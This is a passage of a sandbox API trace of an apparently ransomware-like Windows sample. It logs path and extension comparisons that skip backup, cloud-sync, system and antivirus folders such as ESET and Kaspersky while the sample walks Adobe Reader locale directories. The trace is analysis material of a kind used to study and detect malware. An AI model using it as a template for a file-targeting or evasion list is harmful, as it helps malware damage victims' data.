lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.572] CharUpperBuffW (in: lpsz="FILES\\ACRONIS\\", cchLength=0xe | out: lpsz="FILES\\ACRONIS\\") returned 0xe [0058.572] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.572] CharUpperBuffW (in: lpsz="(X86)\\ACRONIS\\", cchLength=0xe | out: lpsz="(X86)\\ACRONIS\\") returned 0xe [0058.572] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.572] CharUpperBuffW (in: lpsz="FILES\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="FILES\\BACKUPCLIENT\\") returned 0x13 [0058.572] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.572] CharUpperBuffW (in: lpsz="(X86)\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="(X86)\\BACKUPCLIENT\\") returned 0x13 [0058.572] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.573] CharUpperBuffW (in: lpsz="FILES\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="FILES\\BACKUP MANAGER\\") returned 0x15 [0058.573] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.573] CharUpperBuffW (in: lpsz="(X86)\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="(X86)\\BACKUP MANAGER\\") returned 0x15 [0058.573] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.573] CharUpperBuffW (in: lpsz="FILES\\CARBONITE\\", cchLength=0x10 | out: lpsz="FILES\\CARBONITE\\") returned 0x10 [0058.573] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.573] CharUpperBuffW (in: lpsz="(X86)\\CARBONITE\\", cchLength=0x10 | out: lpsz="(X86)\\CARBONITE\\") returned 0x10 [0058.573] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.573] CharUpperBuffW (in: lpsz="FILES\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="FILES\\GOOGLE\\DRIVE\\") returned 0x13 [0058.573] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.573] CharUpperBuffW (in: lpsz="(X86)\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="(X86)\\GOOGLE\\DRIVE\\") returned 0x13 [0058.573] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.573] CharUpperBuffW (in: lpsz="FILES\\DROPBOX\\", cchLength=0xe | out: lpsz="FILES\\DROPBOX\\") returned 0xe [0058.573] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.573] CharUpperBuffW (in: lpsz="(X86)\\DROPBOX\\", cchLength=0xe | out: lpsz="(X86)\\DROPBOX\\") returned 0xe [0058.573] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.573] CharUpperBuffW (in: lpsz="FILES\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="FILES\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.573] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.573] CharUpperBuffW (in: lpsz="(X86)\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="(X86)\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.573] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.574] CharUpperBuffW (in: lpsz="FILES\\ONEDRIVE\\", cchLength=0xf | out: lpsz="FILES\\ONEDRIVE\\") returned 0xf [0058.574] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.574] CharUpperBuffW (in: lpsz="(X86)\\ONEDRIVE\\", cchLength=0xf | out: lpsz="(X86)\\ONEDRIVE\\") returned 0xf [0058.574] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.574] CharUpperBuffW (in: lpsz="VNC\\", cchLength=0x4 | out: lpsz="VNC\\") returned 0x4 [0058.574] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.574] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0058.574] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.574] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0058.574] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.574] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0058.574] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.574] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0058.574] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.574] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0058.574] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.574] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0058.574] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.574] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0058.574] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.574] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0058.574] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.574] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0058.574] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.574] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0058.574] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.574] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0058.574] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.574] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0058.574] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.575] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0058.575] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.575] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0058.575] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.575] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0058.575] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.575] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0058.575] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.575] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0058.575] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.575] CharUpperBuffW (in: lpsz="\\WINRAR\\", cchLength=0x8 | out: lpsz="\\WINRAR\\") returned 0x8 [0058.575] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.575] CharUpperBuffW (in: lpsz="\\ESET", cchLength=0x5 | out: lpsz="\\ESET") returned 0x5 [0058.575] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.575] CharUpperBuffW (in: lpsz="\\AVAST", cchLength=0x6 | out: lpsz="\\AVAST") returned 0x6 [0058.575] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.575] CharUpperBuffW (in: lpsz="\\MALWAREBYTES", cchLength=0xd | out: lpsz="\\MALWAREBYTES") returned 0xd [0058.575] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.575] CharUpperBuffW (in: lpsz="\\SYMANTEC ENDPOINT", cchLength=0x12 | out: lpsz="\\SYMANTEC ENDPOINT") returned 0x12 [0058.575] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.575] CharUpperBuffW (in: lpsz="\\TREND MICRO", cchLength=0xc | out: lpsz="\\TREND MICRO") returned 0xc [0058.575] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.575] CharUpperBuffW (in: lpsz="\\BITDEFENDER", cchLength=0xc | out: lpsz="\\BITDEFENDER") returned 0xc [0058.575] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.575] CharUpperBuffW (in: lpsz="\\PANDA SECURITY", cchLength=0xf | out: lpsz="\\PANDA SECURITY") returned 0xf [0058.575] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.575] CharUpperBuffW (in: lpsz="\\MCAFEE", cchLength=0x7 | out: lpsz="\\MCAFEE") returned 0x7 [0058.575] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\RU_RU\\") returned 0x3d [0058.575] CharUpperBuffW (in: lpsz="\\KASPERSKY LAB", cchLength=0xe | out: lpsz="\\KASPERSKY LAB") returned 0xe [0058.576] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x832c8320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x832c8320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.578] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.579] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.579] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.579] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x832c8320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x832c8320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.581] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.581] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.582] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.582] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x832a21c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x832a21c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.584] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.585] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.585] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.585] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d749580, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ec3e00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ec3e00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.587] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f971c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f971c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.587] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.587] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.587] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d795840, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x832a21c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x832a21c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="TUR", cchCount2=3) returned 1 [0058.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="TUR", cchCount2=3) returned 3 [0058.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="TUR", cchCount2=3) returned 1 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="TUR", cchCount2=3) returned 1 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="TUR", cchCount2=3) returned 1 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="TUR", cchCount2=3) returned 1 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="TUR", cchCount2=3) returned 3 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="TUR", cchCount2=3) returned 1 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="TUR", cchCount2=3) returned 1 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="SENDMAIL.TUR", cchCount2=12) returned 1 [0058.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="SENDMAIL.TUR", cchCount2=12) returned 1 [0058.590] 